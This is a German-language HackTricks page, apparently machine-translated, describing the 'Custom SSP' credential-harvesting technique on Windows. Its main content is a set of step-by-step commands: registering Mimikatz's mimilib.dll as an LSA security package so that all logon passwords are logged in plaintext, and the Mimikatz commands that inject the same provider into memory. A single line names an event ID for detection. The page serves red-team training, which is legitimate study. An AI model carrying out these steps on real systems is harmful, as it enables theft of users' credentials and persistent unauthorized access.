Custom SSP

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Custom SSP

Lernen Sie hier, was ein SSP (Security Support Provider) ist. Sie können Ihr eigenes SSP erstellen, um Kredentiale im Klartext zu erfassen, die zum Zugriff auf die Maschine verwendet werden.

Mimilib

Sie können die mimilib.dll-Binärdatei verwenden, die von Mimikatz bereitgestellt wird. Dies wird alle Kredentiale im Klartext in einer Datei protokollieren. Legen Sie die DLL in C:\Windows\System32\ ab. Holen Sie sich eine Liste der vorhandenen LSA-Sicherheits-Pakete:

attacker@target

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Fügen Sie mimilib.dll zur Liste der Sicherheitsunterstützungsanbieter (Sicherheits-Pakete) hinzu:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Und nach einem Neustart können alle Anmeldeinformationen im Klartext in C:\Windows\System32\kiwissp.log gefunden werden.

Im Speicher

Sie können dies auch direkt im Speicher mit Mimikatz injizieren (beachten Sie, dass es ein wenig instabil/nicht funktionieren könnte):

privilege::debug
misc::memssp

This won't survive reboots.

Minderung

Ereignis-ID 4657 - Überwachung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousConstrained Delegation NextDCShadow

Last updated 7 days ago

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u